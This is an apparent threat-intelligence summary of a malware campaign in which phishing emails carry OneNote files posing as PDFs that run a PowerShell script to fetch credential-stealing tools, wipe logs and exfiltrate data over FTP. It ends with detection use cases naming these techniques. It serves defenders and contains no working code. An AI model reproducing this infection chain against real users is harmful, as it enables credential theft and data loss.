New And Emerging Dangers Hide Within OneNote
Category: Malware Campaign | Industry: Global | Level: Tactical | Source: Trustwave
Since December 2022, there has been an increase of weaponized Microsoft OneNote files infecting users and initiating an infection chain resulting in data compromises or ransomware. Threat actors appear to be favoring OneNote due to its ability to embed files. Malware discovered to be distributed in these recent campaigns has included Formbook, Qakbot, and AsyncRAT (remote access trojan). A recent infection chain reported by Trustwave SpiderLabs begins with a phishing email themed as a "fake product inquiry" with an accompanying OneNote document masquerading as a PDF file. Once executed, the trojanized OneNote file continues to appear as a PDF document and prompts the user to click on a link to "View Document," but actually initiates activity with a PyInstaller-based executable and executes a PowerShell script. Several commands are executed by the script to download a zip file containing credential collection tools, gather system information on the victim's host, clear logs and artifacts, and exfiltrate data to a remote FTP server.
- Malicious Script/Package Installs Malware
Anvilogic Use Cases:
- Python Execution
- Invoke-WebRequest Command
- Windows FTP Exfiltration